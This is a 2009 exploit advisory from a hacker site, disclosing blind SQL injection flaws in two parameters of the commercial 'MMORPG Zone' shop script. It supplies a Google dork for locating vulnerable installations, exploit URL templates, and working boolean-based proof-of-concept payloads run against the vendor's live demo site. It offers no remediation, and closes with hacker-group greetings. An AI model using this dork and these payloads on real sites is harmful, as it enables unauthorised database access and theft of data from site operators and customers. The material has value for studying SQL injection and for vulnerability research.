[x]========================================================================================================================================[x]
 |                                                      AntiSecurity[dot]org                                                                |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Title    		: DMMORPG Zone view_news.php?news_id= and game.php?yes=1&game_id=  blind sql Multiple Remote Vulnerabilities	    |
 | Software 		: MMORPG Zone													    |
 | Vendor   		: http://www.vastal.com/											    |
 | Demo			: http://www.vastal.com/games											    |
 | Price		: USD $600.00													    |
 | Date    		: 22 September 2009 ( Indonesia )										    |
 | Author   		: OoN_Boy													    |
 | Contact  		: oon.boy9@gmail.com												    |
 | Web	    		: http://oonboy.info												    |
 | Blog     		: http://oonboy.blogspot.com											    |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Description 		: MMORPG Zone has all the features needed to run a successfull mmorpg shop online. The features include: Sell Items |
 |			  Sell Accounts, Sell Guides, Real Time Order Tracking, Complete CMS, Accept Orders or sales. Admin Panel is fully  |
 |			  integrated so that you can run a successful site just within minutes						    |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Google Dork 		: inurl:view_news.php?news_id= "By Vastal I-Tech & Co"												    |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Exploit 		: http://localhost/[path]/view_news.php?news_id=[sql]				 	 			    |
 |			: http://localhost/[path]/game.php?yes=1&game_id=[sql]
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Proof of concept	: http://www.vastal.com/games/view_news.php?news_id=7+and+substring(@@version,1,1)=5 True			    |
 |			  http://www.vastal.com/games/view_news.php?news_id=7+and+substring(@@version,1,1)=4 False		            |
 |																	    |					 
 |			  http://www.vastal.com/games/game.php?yes=1&game_id=8+and+substring(@@version,1,1)=5 True			    |
 |			  http://www.vastal.com/games/game.php?yes=1&game_id=8+and+substring(@@version,1,1)=4 False			    |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Greetz		: antisecurity.org batamhacker.or.id                                                                                |
 |		 	  h4ntu Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va                 |
 | 		  	  k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere                  |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Note			: Please help to vote me in http://8.17.84.100/planyouradventour/profil_team.php?uid_group=1466598338		    |
[x]========================================================================================================================================[x]